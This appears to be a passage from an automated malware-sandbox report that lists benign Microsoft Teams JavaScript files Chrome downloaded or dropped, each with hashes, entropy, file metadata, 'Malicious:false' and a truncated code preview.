                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[367927],{367927:(e,t,s)=>{s.d(t,{LF:()=>I,gm:()=>q,K9:()=>F,iA:()=>w,uH:()=>T,VB:()=>j,CP:()=>y,nQ:()=>L,Kh:()=>M,bN:()=>C,h7:()=>n,R5:()=>o,rg:()=>k,GD:()=>N,Jm:()=>E,_A:()=>cs,hC:()=>gs,pf:()=>bs,$x:()=>_s,E0:()=>xe,$d:()=>us,Az:()=>ms,S:()=>ds,TP:()=>fs,be:()=>hs,mz:()=>vs,U6:()=>Pe,xR:()=>Es,yH:()=>Se});var i=s(838369);const n="data-tabster",o="data-tabster-dummy",r=["a[href]","button:not([disabled])","input:not([disabled])","select:not([disabled])","textarea:not([disabled])","*[tabindex]","*[contenteditable]","details > summary","audio[controls]","video[controls]"].join(", "),a=1,l=2,c=3,u=0,d=1,h=2,_=0,m=1,f=2,b=3,v=4,g=0,p=1,E={Invisible:0,PartiallyVisible:1,Visible:2},y={Source:0,Target:1},w={Both:0,Vertical:1,Horizontal:2,Grid:3,GridLinear:4},T={ArrowUp:1,ArrowDown:2,ArrowLeft:3,ArrowRight:4,PageUp:5,PageDown:6,Home:7,End:8},F={Unlimited:0,Limited:1,LimitedTrapFocus:
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):325845
                                                                                                                                                                                                                                                                            Entropy (8bit):5.077674405420929
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:04907U2fCFyyntYdxNbDnA2vnTcmcQt2S+LeiDcmG+0nq75:9907U2fCFyynydxB8mD+575
                                                                                                                                                                                                                                                                            MD5:2F0497EE7805D7E5C12982FA742E95EB
                                                                                                                                                                                                                                                                            SHA1:CF5B85D46771848FDDB47ACB389E99D82BE017C8
                                                                                                                                                                                                                                                                            SHA-256:7C7D359261C388F2ADC5A35F04F32ACCF80C4929B4B5408619ACA8F6F75FDA4C
                                                                                                                                                                                                                                                                            SHA-512:1490CECC49D366AB753C7352A8D9288A7AB94B4E4E7AA8B5A2816026EB388173EB6370E0F7C6D50D7FC13ED750CCA38020A458F8EE7B48CD12B56E0EFFCA762F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(()=>{"use strict";var e,a,c,l,s,o,d,r,f,t,b,n,i,g,m,p={},h={};function u(e){var a=h[e];if(void 0!==a)return a.exports;var c=h[e]={id:e,loaded:!1,exports:{}};return p[e].call(c.exports,c,c.exports,u),h[e]&&u.ff&&delete p[e],c.loaded=!0,c.exports}u.m=p,u.c=h,u.ff=(()=>{try{return!JSON.parse(decodeURIComponent(document.head.getAttribute("data-config")))?.sidecars?.disableWebpackMemoryOptimization}catch{return!1}})(),u.amdO={},e="function"==typeof Symbol?Symbol("webpack then"):"__webpack_then__",a="function"==typeof Symbol?Symbol("webpack exports"):"__webpack_exports__",c=e=>{e&&(e.forEach((e=>e.r--)),e.forEach((e=>e.r--?e.r++:e())))},l=e=>! --e.r&&e(),s=(e,a)=>e?e.push(a):l(a),u.a=(o,d,r)=>{var f,t,b,n=r&&[],i=o.exports,g=!0,m=!1,p=(a,c,l)=>{m||(m=!0,c.r+=a.length,a.map(((a,s)=>a[e](c,l))),m=!1)},h=new Promise(((e,a)=>{b=a,t=()=>(e(i),c(n),n=0)}));h[a]=i,h[e]=(e,a)=>{if(g)return l(e);f&&p(f,e,a),s(n,e),h.catch(a)},o.exports=h,d((o=>{if(!o)return t();var d,r;f=(o=>o.map((o=>{if(null!==o&&
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (14632)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):14740
                                                                                                                                                                                                                                                                            Entropy (8bit):5.4039958808547786
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:7yxZGphPpPVHt9xq+JrcVQ2H+dh6R02te8zXP26T8t2cO8T5m0fN6mdD57h+OR0R:7yxZGnP3t9xqCr+Q76RRN/2Zt2c7gmsr
                                                                                                                                                                                                                                                                            MD5:4020AC6F830FB33A2B29E89DB059B4C0
                                                                                                                                                                                                                                                                            SHA1:2AE741E32C09DD84BCBA604C82393B3362C6E32C
                                                                                                                                                                                                                                                                            SHA-256:F4847442D93F5B9D87C8D54F46E957A0E59AEC8A0E88181767E8894A96BC6F2B
                                                                                                                                                                                                                                                                            SHA-512:36903165D20453C280C7E51667818806F8EF7A8CD326148CD8B1F8F1DDC79A802CC0B66FE9553015AA2E606D5E09017DA5367161D9D182548C70A6E84DCF4F16
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/574626-81646a4463eeafd6.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[574626],{690784:(t,r,e)=>{var o=e(212218)(e(587809),"DataView");t.exports=o},180345:(t,r,e)=>{var o=e(807732),n=e(968386),a=e(2909),s=e(458865),i=e(87225);function c(t){var r=-1,e=null==t?0:t.length;for(this.clear();++r<e;){var o=t[r];this.set(o[0],o[1])}}c.prototype.clear=o,c.prototype.delete=n,c.prototype.get=a,c.prototype.has=s,c.prototype.set=i,t.exports=c},796779:(t,r,e)=>{var o=e(189546),n=e(398316),a=e(902719),s=e(631683),i=e(577051);function c(t){var r=-1,e=null==t?0:t.length;for(this.clear();++r<e;){var o=t[r];this.set(o[0],o[1])}}c.prototype.clear=o,c.prototype.delete=n,c.prototype.get=a,c.prototype.has=s,c.prototype.set=i,t.exports=c},342587:(t,r,e)=>{var o=e(212218)(e(587809),"Map");t.exports=o},525801:(t,r,e)=>{var o=e(678436),n=e(603154),a=e(687181),s=e(328929),i=e(247241);function c(t){var r=-1,e=null==t?0:t.length;for(this.clear();++r<e;){var o=t[r];this.set(o[0],o[1])}}c.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):541760
                                                                                                                                                                                                                                                                            Entropy (8bit):5.737507841275947
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:12288:NNC0BomB2O7xd2TE/qwt1M9CjdO1ENxt52TEd:CqomTc8qwt1M9CjdWEvt4I
                                                                                                                                                                                                                                                                            MD5:5EDD1B8C1AA1468EDDEA635D049B52C8
                                                                                                                                                                                                                                                                            SHA1:73F2F0C339231BD489391DA72EB66E63B2A48239
                                                                                                                                                                                                                                                                            SHA-256:1B457EC13FE24E863F588CE69BE6A0A9AC1948761590B79B44988ACE7C3511CF
                                                                                                                                                                                                                                                                            SHA-512:4B056D5463A92578D511FE3D40E70DB24720AE74C3C47654BED874E2A8151D0CD35B522733AC1551C37992A982B4261DADB71658C69FEAE41AE7E5D45CA94498
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/13290-ac75815148d48467.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[13290],{78727:(e,t,n)=>{e.exports=n.p+"133bf0a0b104ec3dfc5b9ab207e54873.svg"},960935:(e,t,n)=>{e.exports=n.p+"c52bdfa460d7b878541ff0d9833e3c7b.svg"},870586:(e,t,n)=>{e.exports=n.p+"93bf1cc8b8b8092aab2c385d85d22c8d.svg"},834818:(e,t,n)=>{e.exports=n.p+"79f07ba26ed583574678b31546848509.svg"},603313:(e,t,n)=>{e.exports=n.p+"33c8b3e3c8d71273ed9abc4d1bec9bcc.svg"},567322:(e,t,n)=>{e.exports=n.p+"5d07fdf28991f39897b8734021141a6f.svg"},604322:(e,t,n)=>{e.exports=n.p+"0d10d16cedc7b8262d0863ae455bb683.svg"},791542:(e,t,n)=>{e.exports=n.p+"774888c01ebff051c2cad178c17079b3.svg"},118356:(e,t,n)=>{e.exports=n.p+"36fd037c0c6525c9044c5c8ef757c740.svg"},952388:(e,t,n)=>{e.exports=n.p+"5066e146579e847ea9f2d818aab586bb.svg"},152248:(e,t,n)=>{e.exports=n.p+"7aa4c2455abe8a0c8cfa1e8e4b93494c.svg"},444257:(e,t,n)=>{e.exports=n.p+"e0420569cdac40ed7e659a1dae697de8.svg"},698037:(e,t,n)=>{"use strict";n.d(t,{hT:()
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (16145)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):16253
                                                                                                                                                                                                                                                                            Entropy (8bit):5.32023556104866
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:UHGHYU1V4di/pFRwt01Ls4v74FIXX/hIik6pjRiE1ntH:UHG4U1V4diVi2Ls+74FIXX/Gik6pjwid
                                                                                                                                                                                                                                                                            MD5:1EFDD6A85BA00272896DC29AF480ACD7
                                                                                                                                                                                                                                                                            SHA1:2FB2D7957ED143B078664B99B83FFE98623090B6
                                                                                                                                                                                                                                                                            SHA-256:2ED23F9D4D8C12FCC9EE846A86333EAD49C2CCB2E081EDC4E12B64D703DD59C9
                                                                                                                                                                                                                                                                            SHA-512:077387F39B2AE72A893261DE8FD3EDB3ED4E3FD948B048A88D107BA72904151C4994792F6C954AE47A6FFD95F811429AD3D3AEB7DF4AB4423115F1E453CDE197
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/326041-fdfc59addb335cea.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[326041,797071,693593],{797071:(e,t,n)=>{"use strict";n.d(t,{gB:()=>b,be:()=>s,m$:()=>c,kL:()=>f,JR:()=>D,gl:()=>S,_G:()=>v});var r=n(513432),o=n.n(r),i=n(712284),a=n(354055);function s(e,t,n){const r=e.slice();return r.splice(n<0?r.length+n:n,0,r.splice(t,1)[0]),r}function d(e,t){return e.reduce(((e,n,r)=>{const o=t.get(n);return o&&(e[r]=o),e}),Array(e.length))}function u(e){return null!==e&&e>=0}const l={scaleX:1,scaleY:1},c=e=>{var t;let{rects:n,activeNodeRect:r,activeIndex:o,overIndex:i,index:a}=e;const s=null!=(t=n[o])?t:r;if(!s)return null;const d=function(e,t,n){const r=e[t],o=e[t-1],i=e[t+1];if(!r||!o&&!i)return 0;if(n<t)return o?r.left-(o.left+o.width):i.left-(r.left+r.width);return i?i.left-(r.left+r.width):r.left-(o.left+o.width)}(n,a,o);if(a===o){const e=n[i];return e?{x:o<i?e.left+e.width-(s.left+s.width):e.left-s.left,y:0,...l}:null}return a>o&&a<=i?{x:-s.width-d,y:0,...l}:a
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (41594)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):41712
                                                                                                                                                                                                                                                                            Entropy (8bit):5.29491411540647
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:4kqwbq1jw+8Thjo4i+I3h2Zixcer63Ns5qJKOw:4RwbqFuTCjIer69Jdw
                                                                                                                                                                                                                                                                            MD5:F9D05C5CD421E615E84AA0595ACAA352
                                                                                                                                                                                                                                                                            SHA1:DD1975343D52A1565C4BAFEF306729040FEA1C9B
                                                                                                                                                                                                                                                                            SHA-256:B75C9801EC0811E358FFC023B1644C416F99808033F551F71E5E948FF785A5B1
                                                                                                                                                                                                                                                                            SHA-512:AFD2EE8C0C3C5A7E688ACAA757881DD1F7912E63E6C95EA013CDE33F22956CD09B8811FD3432472ACA1C370BCB69B83420C651A040492E73157A3B69375A7BA4
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[412417],{975021:(e,t,n)=>{n.d(t,{$3:()=>s,or:()=>c,I6:()=>f,Xx:()=>d,Ui:()=>p,gk:()=>h,iJ:()=>v,T9:()=>m,d1:()=>y,mv:()=>g,cy:()=>b});var r=n(850734),i=n(813801),o=n(613995),a=n(401385),u=n(597309),s=Object.prototype.hasOwnProperty;function c(e,t){var n=e.__typename,r=e.id,i=e._id;if("string"==typeof n&&(t&&(t.keyObject=void 0!==r?{id:r}:void 0!==i?{_id:i}:void 0),void 0===r&&(r=i),void 0!==r))return"".concat(n,":").concat("number"==typeof r||"string"==typeof r?r:JSON.stringify(r))}var l={dataIdFromObject:c,addTypename:!0,resultCaching:!0,canonizeResults:!1};function f(e){return(0,r.o)(l,e)}function d(e){var t=e.canonizeResults;return void 0===t?l.canonizeResults:t}function p(e,t){return(0,i.A_)(t)?e.get(t.__ref,"__typename"):t&&t.__typename}var h=/^[_a-z][_0-9a-z]*/i;function v(e){var t=e.match(h);return t?t[0]:e}function m(e,t,n){return!!(0,o.U)(t)&&(b(t)?t.every((function(
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (879)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):1001
                                                                                                                                                                                                                                                                            Entropy (8bit):5.101417090131756
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:wp3sp38fCaDiRFdhaKWv5iz77RfzSj3TXicEAzELRhc8N:wp3sp3ACzd3WvcxrkbzELN
                                                                                                                                                                                                                                                                            MD5:FD46D921680CA184F472CA46E52795D2
                                                                                                                                                                                                                                                                            SHA1:30A8E5422FDA4A8E8A271ACF1472B942A9DCDC94
                                                                                                                                                                                                                                                                            SHA-256:AA3914B5961F002F6AEF22894193EDBBF0B0CD36F97530F2D4559084AF66C374
                                                                                                                                                                                                                                                                            SHA-512:CFD1469F02B981FFC5BECC85717151C9E8258FA4EE1C05E521817BA2DD2995B052F3B1978208C2CB07BD2132CAC374D1AFB29449C36CC4A5BEC0DF723548512A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/gallery-locale-en-us-83a3d27de297752a.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[227307],{467681:(e,a,l)=>{l.r(a),l.d(a,{default:()=>t});const t={namespace:"gallery",locale:"en-us",translations:{gallery_galleryEmptyStateMessage:"Photos added to chat automatically show up here.",gallery_galleryEmptyStateMessageCommunities:"Photos added to community automatically show up here.",gallery_galleryLoadingMessage:"Loading Photos...",gallery_gallery_grid_images:"Images from",gallery_gallery_grid_label:"Image gallery",gallery_imageGroupLastMonth:"Last Month",gallery_imageGroupMonth:"Earlier This Month",gallery_imageGroupToday:"Today",gallery_imageGroupWeek:"Earlier This Week",gallery_imageGroupYesterday:"Yesterday",gallery_imageLabel:"Image",gallery_image_menu_viewInChat:"View in Chat",gallery_image_menu_viewInCommunity:"View in Community"}}}}]);.//# sourceMappingURL=https://local.teams.office.com/sourcemaps/hashed-assets/gallery-locale-en-us-83a3d27de297752a.js.ma
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):325845
                                                                                                                                                                                                                                                                            Entropy (8bit):5.077674405420929
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:04907U2fCFyyntYdxNbDnA2vnTcmcQt2S+LeiDcmG+0nq75:9907U2fCFyynydxB8mD+575
                                                                                                                                                                                                                                                                            MD5:2F0497EE7805D7E5C12982FA742E95EB
                                                                                                                                                                                                                                                                            SHA1:CF5B85D46771848FDDB47ACB389E99D82BE017C8
                                                                                                                                                                                                                                                                            SHA-256:7C7D359261C388F2ADC5A35F04F32ACCF80C4929B4B5408619ACA8F6F75FDA4C
                                                                                                                                                                                                                                                                            SHA-512:1490CECC49D366AB753C7352A8D9288A7AB94B4E4E7AA8B5A2816026EB388173EB6370E0F7C6D50D7FC13ED750CCA38020A458F8EE7B48CD12B56E0EFFCA762F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/runtime-a8f15edb1740a5d9.js
                                                                                                                                                                                                                                                                            Preview:(()=>{"use strict";var e,a,c,l,s,o,d,r,f,t,b,n,i,g,m,p={},h={};function u(e){var a=h[e];if(void 0!==a)return a.exports;var c=h[e]={id:e,loaded:!1,exports:{}};return p[e].call(c.exports,c,c.exports,u),h[e]&&u.ff&&delete p[e],c.loaded=!0,c.exports}u.m=p,u.c=h,u.ff=(()=>{try{return!JSON.parse(decodeURIComponent(document.head.getAttribute("data-config")))?.sidecars?.disableWebpackMemoryOptimization}catch{return!1}})(),u.amdO={},e="function"==typeof Symbol?Symbol("webpack then"):"__webpack_then__",a="function"==typeof Symbol?Symbol("webpack exports"):"__webpack_exports__",c=e=>{e&&(e.forEach((e=>e.r--)),e.forEach((e=>e.r--?e.r++:e())))},l=e=>! --e.r&&e(),s=(e,a)=>e?e.push(a):l(a),u.a=(o,d,r)=>{var f,t,b,n=r&&[],i=o.exports,g=!0,m=!1,p=(a,c,l)=>{m||(m=!0,c.r+=a.length,a.map(((a,s)=>a[e](c,l))),m=!1)},h=new Promise(((e,a)=>{b=a,t=()=>(e(i),c(n),n=0)}));h[a]=i,h[e]=(e,a)=>{if(g)return l(e);f&&p(f,e,a),s(n,e),h.catch(a)},o.exports=h,d((o=>{if(!o)return t();var d,r;f=(o=>o.map((o=>{if(null!==o&&
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (47948)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):48056
                                                                                                                                                                                                                                                                            Entropy (8bit):5.488438690236072
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:ElQCfATU72Qpii93NJQfhG/dSkcPDFjnKijWgYyi1MATzesw5f9qxw85hW/5vWic:OAo72K93NJKhtd1iOcfCswl/h0F7lVGI
                                                                                                                                                                                                                                                                            MD5:D4387B0B42E765E46693A8ACE3AF5E2F
                                                                                                                                                                                                                                                                            SHA1:5B3883F3B9E01D9C428C39FBE8600689E850242A
                                                                                                                                                                                                                                                                            SHA-256:8354F26155FC49722B3DD57DAFADD25C12A07DA830D17A5A056700234CF72A3C
                                                                                                                                                                                                                                                                            SHA-512:222A208432F39521092548557CB9985AE7153F96B4126EDE8AB4312608551DC7A7B2391C452CBD94BA9A99FD0CEA580A8A9B26B82D5BB2A84BDD78CD44C6612E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[805039],{492745:(e,a,t)=>{t.d(a,{I:()=>n});const n=(0,t(965804).O)({tagIcon:{sj55zd:"fk7sj7m",De3pzq:"f1traznj",a9b677:"fh32b2y",Bqenvij:"f1sw78cg",Bgfg5da:0,B9xav0g:0,oivjwe:0,Bn0qgzm:0,B4g9neb:0,zhjwy3:0,wvpqe5:0,ibv6hh:0,u1mtju:0,h3c5rm:0,vrafjx:0,Bekrc4i:0,i8vvqc:0,g2u3we:0,icvyot:0,B4j52fo:0,irswps:"f98wh1h",Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"f5q2cvs",Byoj8tv:0,uwmqm3:0,z189sj:0,z8tnut:0,B0ocmuz:"f1ace9t4"},contrast:{De3pzq:"f1blnnmj",sj55zd:"fbz3ivo"}})},743196:(e,a,t)=>{t.d(a,{R:()=>o});var n=t(362328);const o={kind:"Document",get definitions(){const e=(0,n.G)("mutation sendSearchActionsInstrumentation($eventType:String!,$localTime:String!,$logicalId:String!,$metadata:String) {sendSearchActionsInstrumentation(eventType:$eventType,localTime:$localTime,logicalId:$logicalId,metadata:$metadata)}");return delete this.definitions,this.definitions=e.definitions}}
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (21232)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):21340
                                                                                                                                                                                                                                                                            Entropy (8bit):5.7585955980452805
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:oyw1NskKom67NmJoZm5U6DJOTkoAPru8uA0BvkrGgmTAKd0Dfs3w:loNI3hJOTrY0BvkrXmTAKdKfsw
                                                                                                                                                                                                                                                                            MD5:E98A29DDB910BFCFBCA3B6E6D5F1D386
                                                                                                                                                                                                                                                                            SHA1:FAD7F04C1FA5EED36A43313430962F07BECB13FE
                                                                                                                                                                                                                                                                            SHA-256:2F75B07E3C3ED925D2E97B334FD2BA0FE42C2B0291C3F9C1AA6AB6152AFC3296
                                                                                                                                                                                                                                                                            SHA-512:51BB8DC7A59F707E4239DA4F96313A7018BCDFF9B051EF30A7D0914DC3C7D8195F76A32F846FE492942638B8BF8480F1BD8AE37429045C6087B62F1AF37B39C7
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[795307],{554186:(t,e,r)=>{var i=r(105117),n=r(94354),s=n;s.v1=i,s.v4=n,t.exports=s},997811:t=>{for(var e=[],r=0;r<256;++r)e[r]=(r+256).toString(16).substr(1);t.exports=function(t,r){var i=r||0,n=e;return[n[t[i++]],n[t[i++]],n[t[i++]],n[t[i++]],"-",n[t[i++]],n[t[i++]],"-",n[t[i++]],n[t[i++]],"-",n[t[i++]],n[t[i++]],"-",n[t[i++]],n[t[i++]],n[t[i++]],n[t[i++]],n[t[i++]],n[t[i++]]].join("")}},596778:t=>{var e="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(e){var r=new Uint8Array(16);t.exports=function(){return e(r),r}}else{var i=new Array(16);t.exports=function(){for(var t,e=0;e<16;e++)0==(3&e)&&(t=4294967296*Math.random()),i[e]=t>>>((3&e)<<3)&255;return i}}},105117:(t,e,r)=>{var i,n,s=r(596778),a=r(997811),o=0,I=0;t.exports=fun
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (6267)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):6375
                                                                                                                                                                                                                                                                            Entropy (8bit):4.832022987269524
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:FrN9ujaDgFoSstYXnF82MJxJlFk2jOFbgrHQw4+sX43Jg4bDWUz0R4IsTBTj:FrN9mo7tYr+nGpuTxj
                                                                                                                                                                                                                                                                            MD5:E3947426289E682F86072FAD145E30FE
                                                                                                                                                                                                                                                                            SHA1:883FA22D817AB2BF256D5780ACA60C519F221554
                                                                                                                                                                                                                                                                            SHA-256:E34614C2F439E569A2D4D5FDDBEC5341E66C3544D6918E37B058E5D9051A9BAB
                                                                                                                                                                                                                                                                            SHA-512:2FA3C2A382D022D3F85DED713E21AEB29908EC829E490D85BD8D8EA4785B715F1C12289200755FC0625B4121794D61D6CD026A17EA79C0F63754C054C6C8B1CA
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/505772-1af27dc373b0b4e5.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[505772],{598476:(e,C,t)=>{t.d(C,{A:()=>r});var a=t(513432),l=t(395225),n=t.n(l),s=t(485529),c=t(829289),r=(0,s.Ke)({svg:function(e){var C=e.classes;return a.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:C.svg},a.createElement("g",{className:n()(c.Q.outline,C.outlinePart)},a.createElement("path",{d:"M11.5 8.5C11.5 8.22386 11.2761 8 11 8H9V6C9 5.72386 8.77614 5.5 8.5 5.5C8.22386 5.5 8 5.72386 8 6V8H6C5.72386 8 5.5 8.22386 5.5 8.5C5.5 8.77614 5.72386 9 6 9H8V11C8 11.2761 8.22386 11.5 8.5 11.5C8.77614 11.5 9 11.2761 9 11V9H11C11.2761 9 11.5 8.77614 11.5 8.5Z"}),a.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M8.5 3C11.5376 3 14 5.46243 14 8.5C14 9.83879 13.5217 11.0659 12.7266 12.0196L16.8536 16.1464C17.0488 16.3417 17.0488 16.6583 16.8536 16.8536C16.68 17.0271 16.4106 17.0464 16.2157 16.9114L16.1464 16.8536L12.0196 12.7
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (18459)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):18567
                                                                                                                                                                                                                                                                            Entropy (8bit):5.392203233495941
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:LAi3uZJIFAgk156FIFhmIJnHBxXX82oXR:LV3uaTktBBZWR
                                                                                                                                                                                                                                                                            MD5:F1E2E125B6A655A912A2732F8DD84774
                                                                                                                                                                                                                                                                            SHA1:19F8C0FC642A97EDD95E7A4623CF81221E2DFDA1
                                                                                                                                                                                                                                                                            SHA-256:F3AE7ECE0106D467F5664C8865AF069E73CBB617BDEC69AE925DF65C516C3E7F
                                                                                                                                                                                                                                                                            SHA-512:92ECB71EC56F834B32B49DC3B45CFF1E5345C32C7919B0BB6B602A55B62B1E5A2669F13CF220233B29A2E646D2CC0E1E85237542ECA3DF01CA03C5148C725C40
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[196395],{692934:(e,n,t)=>{t.d(n,{J4:()=>c,Dl:()=>h,On:()=>m,As:()=>C,Fd:()=>s,L2:()=>p,Oi:()=>v,oU:()=>d,ge:()=>f,wI:()=>I,PX:()=>w,X4:()=>l,kL:()=>g,qP:()=>u});var a=t(938510),r="locale",i="ver",o="name",s=(0,a.o)({UserExt:[0,"user"],DeviceExt:[1,"device"],TraceExt:[2,"trace"],WebExt:[3,"web"],AppExt:[4,"app"],OSExt:[5,"os"],SdkExt:[6,"sdk"],IntWebExt:[7,"intweb"],UtcExt:[8,"utc"],LocExt:[9,"loc"],CloudExt:[10,"cloud"],DtExt:[11,"dt"]}),c=(0,a.o)({id:[0,"id"],ver:[1,i],appName:[2,o],locale:[3,r],expId:[4,"expId"],env:[5,"env"]}),u=(0,a.o)({domain:[0,"domain"],browser:[1,"browser"],browserVer:[2,"browserVer"],screenRes:[3,"screenRes"],userConsent:[4,"userConsent"],consentDetails:[5,"consentDetails"]}),l=(0,a.o)({locale:[0,r],localId:[1,"localId"],id:[2,"id"]}),d=(0,a.o)({osName:[0,o],ver:[1,i]}),f=(0,a.o)({ver:[0,i],seq:[1,"seq"],installId:[2,"installId"],epoch:[3,"epoch"]}),
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (52213)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):52321
                                                                                                                                                                                                                                                                            Entropy (8bit):5.437222650712969
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:sThOnPn9ptfsLRuSIpQAunOXff4VgsLA6Ch/dY5psmfrUXux8KeP7P6DJVYkCIAo:h9ptfMuSIpQAunafgukNTUw8KSX2jT
                                                                                                                                                                                                                                                                            MD5:B90B4317F4C89B3B5883E64BA41A8BA6
                                                                                                                                                                                                                                                                            SHA1:C5E12D1E07D31322E44E34DA9DD4D70FC095D576
                                                                                                                                                                                                                                                                            SHA-256:2FD2F811EB96348C312B68C5A9E01DED113C95C2C53352EDC6E6496048D4309E
